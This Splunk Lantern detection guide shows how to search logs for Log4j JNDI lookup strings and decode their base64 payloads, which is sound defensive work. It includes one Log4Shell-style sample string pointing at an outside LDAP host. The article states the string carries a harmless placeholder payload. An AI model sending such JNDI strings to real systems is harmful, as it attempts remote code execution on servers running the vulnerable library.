Skip to main content
 
Splunk Lantern

Suspicious encoded strings

 

The vulnerability that attackers can exploit exists in the JNDI lookup feature of the Log4j library, so the presence of suspicious strings there can be an indicator of compromise. You can run two different types of searches to identify and better understand these suspicious strings - a first stage search to look for potentially suspicious activity indicated by the presence of ${jndi:ldap://,  and a second search that uses CyberChef for Splunk or any base64 decoder to better understand the behavior of strings found in the first search. 

Required data

Procedure

Step 1

Run the following search. You can optimize it by specifying an index and adjusting the time range.

sourcetype=bro:http:json user_agent=${jndi:*}
| stats sparkline values(user_agent) count BY src_ip, dest_ip, dest_port

Search explanation

The table provides an explanation of what each part of this search achieves.

Splunk Search Explanation
sourcetype=bro:http:json user_agent=${jndi:*} Search the bro:http:json sourcetype for the malicious user-agent string, ${jndi.
| stats sparkline values(user_agent) count BY src_ip, dest_ip, dest_port Return the results in a table with a sparkline showing a count, grouped by source IP, destination IP and destination port.

Result

This search looks for suspicious strings in the user_agent field. It is possible that these strings can live elsewhere, so if a specific field can not be isolated, an unstructured search such as this will need to be run:

index=* ${jndi:*}

This search is not well-optimized since it is unstructured with a wildcard, but it would be wide-ranging enough to ensure that nothing is missed. You can optimize this search with items such as specific asset address ranges or device categorizations.

Using accelerated datamodels from our Common Information Model is another way to optimize this search. For example, http_user_agent is a field in the Web datamodel and can be searched using tstats techniques.

Positive results from this search do not mean you have been compromised. However, they would confirm that attackers are looking for opportunity to breach or exploit systems. Additional examination of the systems that are seeing this activity is required to determine if a breach or exploitation has occurred. To understand the commands running and identify if behavior is currently just scanning or exploitation, analysis of any encoded strings is needed. 

Step 2

You can use CyberChef for Splunk or any base64 decoder to better understand the behavior of strings found in the previous step.

Because we don’t want to put strings into this article that would be run to scan a site, in the search written in this step, the base64 has been pulled out and instead you can see an example of what that might look like in an image in the Result section of this search. The image shows the decoded command but the search written in this step that you can copy and paste will provide a different result.

Run the following search. You can optimize it by specifying an index and adjusting the time range.

| makeresults
| eval test="${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/U28gTG9uZywgYW5kIFRoYW5rcyBmb3IgQWxsIHRoZSBGaXNo}"
| rex field=test "\/Base64\/(?\S+)}"
| table string
| cyberchef infield=string outfield=result operation=FromBase64

Search explanation

The table provides an explanation of what each part of this search achieves. You can adjust this query based on the specifics of your environment.

Splunk Search Explanation
| makeresults Create a temporary, dummy event.
| eval test="${jndi:ldap://45.155.205.233:12344/Basic/Co...sIHRoZSBGaXNo}"  
| rex field=test "\/Base64\/(?\S+)}"
 
 
| table string Display the results in a table with columns in the order shown.
| cyberchef infield=string outfield=result operation=FromBase64  

Result

Modify the above search to use the decoded base64 command, as shown in this example:

By using a base64 decoder, you can get results displaying a curl statement with wget and associated IP addresses. These IP addresses could go into your watchlists.

Next steps

Finally, you might be interested in other processes associated with the Detecting Log4j remote code execution use case.